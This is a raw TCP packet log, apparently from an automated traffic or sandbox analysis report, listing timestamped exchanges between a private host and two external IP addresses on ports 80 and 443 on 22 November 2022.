                                                                                Nov 22, 2022 05:09:03.816052914 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.816066980 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.816107988 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.816126108 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.816150904 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.816214085 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.817075014 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.817909956 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.817955017 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.817996979 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.818025112 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.818041086 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.818105936 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.818947077 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.818993092 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.819036007 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.819056034 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.819078922 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.819138050 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.820278883 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.820369959 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.820411921 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.820442915 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.820453882 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.820497990 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.820513964 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991302013 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991367102 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991399050 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991413116 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991457939 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991458893 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991503954 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991547108 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991555929 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991590023 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991633892 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991636038 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991677999 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991719961 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991723061 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.991767883 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991811037 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.991813898 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.992643118 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992690086 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992702961 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.992733955 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992780924 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992796898 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.992822886 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992866993 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992906094 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.992909908 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992954016 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.992959023 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.993446112 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.993489981 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.993499994 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.993530989 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.993573904 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.993580103 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.994410992 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.994455099 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.994468927 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.994496107 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.994539976 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.994544983 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.994580030 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.994626045 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.995471954 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995516062 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995558977 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995562077 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.995600939 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995641947 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995651960 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.995688915 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995731115 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995740891 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.995778084 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.995829105 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.996388912 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.996433020 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.996474028 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.996484995 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.996515989 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.996565104 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.997796059 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.997839928 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.997880936 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.997895956 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.997922897 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.998023033 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.999584913 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.999627113 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.999667883 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.999676943 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:03.999710083 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:03.999758959 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.171508074 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171549082 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171576023 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171602964 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171631098 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171658039 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171683073 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171704054 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.171710014 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171704054 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.171704054 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.171736956 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.171792030 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.172539949 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.172568083 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.172676086 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.172684908 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.172713041 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.172750950 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.173203945 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.173230886 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.173258066 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.173269033 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.173278093 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.173321009 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.174209118 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174235106 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174259901 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174264908 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.174285889 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174308062 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.174360991 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174386024 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174411058 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174412966 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.174436092 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.174457073 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.175558090 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175585032 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175606966 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175621986 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.175632000 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175657988 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175662041 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.175683975 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175709009 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175709963 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.175734043 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175757885 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.175761938 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.175810099 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.176395893 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176422119 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176446915 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176471949 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176476002 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.176522017 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.176552057 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176578999 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176604033 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176630020 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.176629066 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.176822901 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.177755117 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177783012 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177807093 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177831888 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.177834034 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177860975 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177885056 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.177886009 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177911997 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177930117 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.177937984 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.177983999 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.179450989 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.179477930 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.179502964 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.179531097 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.179572105 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.179598093 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.179622889 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.349636078 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.349736929 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.349869013 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.349931955 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.349987984 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350044012 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350100040 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350102901 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350102901 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350158930 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350167036 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350218058 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350275040 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350292921 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350330114 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350385904 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350400925 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350610018 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350668907 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350687027 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.350723982 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350780964 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.350795031 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.352147102 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:04.352291107 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.662213087 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.662293911 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:04.840081930 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:05.115153074 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:05.358623981 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:05.376358032 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.376416922 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:05.376487970 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.377387047 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.377415895 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:05.724080086 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:05.724210024 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.743047953 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.743104935 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:05.743565083 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:05.769882917 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:05.769912004 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:06.041541100 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:06.041697025 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:06.041788101 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:06.042165995 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:06.042197943 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:06.042217016 CET49174443192.168.2.2269.160.38.3
                                                                                Nov 22, 2022 05:09:06.042227983 CET4434917469.160.38.3192.168.2.22
                                                                                Nov 22, 2022 05:09:06.095182896 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.095243931 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.273483038 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.550064087 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.550168037 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.550224066 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.550288916 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.550376892 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.550378084 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.551752090 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.551815033 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.551879883 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.551924944 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.551944017 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.552026987 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.553854942 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.625479937 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.625541925 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:06.803131104 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:06.803160906 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082398891 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082436085 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082459927 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082487106 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082622051 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.082807064 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082844019 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082895994 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.082915068 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.082936049 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.083162069 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.084724903 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.084762096 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.084898949 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260283947 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260345936 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260389090 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260431051 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260482073 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260482073 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260493994 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260544062 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260587931 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260610104 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260629892 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260673046 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260694027 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260715961 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260756969 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260771036 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260799885 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260840893 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260857105 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.260884047 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.260941982 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.262238979 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262290955 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262334108 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262348890 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.262397051 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262444973 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262461901 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.262487888 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.262545109 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.265674114 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.438704967 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.438818932 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.438864946 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.438935041 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.438977957 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.439019918 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.439064980 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.439110994 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.439116001 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.439116001 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.439196110 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.439913034 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.439963102 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440005064 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440054893 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.440064907 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440134048 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440134048 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.440187931 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440231085 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440252066 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.440274954 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.440335989 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.441920996 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.441965103 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.442008018 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.442053080 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.442054987 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.442121983 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.443135977 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.443187952 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.443233013 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.443274975 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.443281889 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.443344116 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.445226908 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.445274115 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.445313931 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.445358038 CET804917334.174.217.42192.168.2.22
                                                                                Nov 22, 2022 05:09:07.445370913 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.445432901 CET4917380192.168.2.2234.174.217.42
                                                                                Nov 22, 2022 05:09:07.447089911 CET804917334.174.217.42192.168.2.22
